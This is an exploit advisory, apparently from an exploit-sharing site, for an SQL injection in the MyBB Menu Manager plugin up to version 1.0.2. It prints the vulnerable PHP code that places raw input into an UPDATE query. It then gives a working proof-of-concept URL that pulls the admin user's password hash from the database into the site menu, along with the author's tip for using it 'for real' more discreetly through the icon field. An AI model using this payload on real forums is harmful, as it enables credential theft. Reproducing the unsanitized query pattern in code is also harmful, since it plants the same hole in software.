MyBB Plugin Menu Manager <= 1.0.2 SQL injection

Download | Vote Up (0) | Vote Down (0)

# Version: 1.0.2

Vulnerable Code
---------------- 

 1       
 2$title = $mybb->input['title'];
 3$icon = $mybb->input['icon'];
 4$link = $mybb->input['link'];
 5$newwindow = isset($_REQUEST['newwindow']) ? 1 : 0;
 6
 7if (empty($title))
 8{
 9    $errors[] = $lang->menumanager_error_no_title;
10}
11
12if (empty($link))
13{
14    $errors[] = $lang->menumanager_error_no_link;
15}
16
17if($errors)
18{
19    $page->output_inline_error($errors);
20}
21else
22{
23
24$db->write_query("UPDATE ".TABLE_PREFIX."menumanager
25               SET title ='$title', link ='$link' ,icon ='$icon' ,newwindow ='$newwindow'
26                WHERE id = $id LIMIT 1
27                ");

Simple PoC (must be executed by an admin);
------------------------------------------

http://[site]/admin/index.php?module=config/menumanager&action=edit2&id=1&link=1&title=', title=(SELECT password FROM mybb_users WHERE uid=1), disabled=0, icon='

When executed, just check the index, the result should be in the menu. That's not discrete at all, so if you want to use it for real, use the icon value instead of title to the subquery.

Groucho

Be the first to give feedback !
Please login to comment !